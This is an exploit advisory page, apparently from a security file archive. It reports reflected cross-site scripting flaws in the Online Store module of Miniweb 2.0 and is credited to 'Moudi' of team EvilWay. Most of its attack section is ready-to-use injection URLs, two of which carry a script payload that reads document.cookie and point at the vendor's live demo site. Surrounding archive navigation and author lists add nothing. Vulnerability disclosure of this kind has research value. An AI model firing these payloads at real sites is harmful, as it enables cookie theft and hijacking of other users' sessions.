Miniweb 2.0 Online Store XSS

Miniweb 2.0 Online Store XSS: Posted Jul 29, 2009; Authored by Moudi; The Online Store module for Miniweb version 2.0 suffers from cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 5ff32473453186a403d91f2041cb86e4c291fcdd9e2ad87f60c2da61be5095c7; Download | Favorite | View

Miniweb 2.0 Online Store XSS

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Miniweb 2.0 Module (Online Store) Remote XSS Vulnerabilities
==============================================================================

  [»] Script:             [ Miniweb 2.0 ]
  [»] Language:           [ PHP ]
        [»] Download:           [ https://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17  ]
  [»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $250.00 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit XSS + LIVE : vulnerability ]===

[»] https://www.site.com/patch/index.php/[XSS]
[»] https://www.site.com/patch/index.php?pluginoption=[XSS]

[»] https://miniweb2.com/moduledemo/onlinestore/index.php/"><script>alert(document.cookie);</script>
[»] https://miniweb2.com/moduledemo/onlinestore/index.php?pluginoption="><script>alert(document.cookie);</script>

Note: have some other XSS on index.php ..

Author: Moudi

###########################################################################

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Miniweb 2.0 Online Store XSS

Miniweb 2.0 Online Store XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Miniweb 2.0 Online Store XSS

Share This

Miniweb 2.0 Online Store XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems